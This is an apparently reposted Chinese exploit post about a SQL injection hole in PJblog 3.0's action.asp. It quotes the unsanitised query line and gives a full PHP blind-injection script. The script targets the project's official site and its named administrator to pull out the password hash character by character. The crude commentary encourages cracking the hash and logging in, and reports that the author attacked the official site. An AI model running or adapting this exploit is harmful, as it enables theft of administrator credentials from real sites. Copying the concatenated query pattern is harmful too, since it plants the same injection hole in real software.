PJblog V3.0 0day+EXP 's

admin 2017年4月30日08:00:13评论246 views字数 1390阅读4分38秒阅读模式
摘要

作者:bink影响版本:3.0
信息来源:零客网安www.0kee.com
Author:bink
漏洞文件:action.asp

作者:bink

影响版本:3.0
信息来源:零客网安www.0kee.com
Author:bink
漏洞文件:action.asp

很SB的洞。
第14行

strcname=request("cname") set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")

这个贱B下午就跑人官方去捣乱了。

强奸出的密码是sha1,突死有彩虹表的人继续强奸吧
直接吊hashkey可以进前台操蛋
变量是双引号包着的,所以工具吊不出。
扔个exp。 好不好使看各位造化鸟。

<?php /* PJblog V3.0 0day exp code by 小蟑螂&bink www.0kee.com    www.t00ls.net 09.04.22 */  $url="http://www.pjhome.net";    //注入地址 $var_name="puterjam";    //管理员 $var_key="check_right";  if ($_SESSION["LenI"]){ $LenI=$_SESSION["LenI"]; }else{ $LenI=1; } for($i=$LenI;$i<=40;$i++){ if($_SESSION["LenDo"]){ $StaAsc=$_SESSION["LenDo"]; }else{ $StaAsc=31; } echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127"; for($j=$StaAsc;$j<=127;$j++){ $newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=/''.$var_name.'/'%29%3e'.$j.'%20and%20"1"="1'; $var_pagelen=file_get_contents($newurl); $var_newpagelen=strpos($var_pagelen,$var_key); if($var_newpagelen == true){ $_SESSION["tmpPassWord"]=$_SESSION["tmpPassWord"].chr($j); unset($_SESSION["LenDo"]); $_SESSION["LenI"]=$i+1; doReload(); break; } if($j == $StaAsc+10){ doReload(); break; } } } if ($_SESSION["LenI"]==40 && !($_SESSION["LenDo"])){ echo $_SESSION["tmpPassWord"]; }  function doReload(){ ?> <script  language="javascript"> <!-- window.setTimeout('location.reload()',1000); //--> </script> <?php } ?>

此文发布时官方已经打了补丁

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月30日08:00:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   PJblog V3.0 0day+EXP 'shttps://cn-sec.com/archives/44694.html

发表评论

匿名网友 填写信息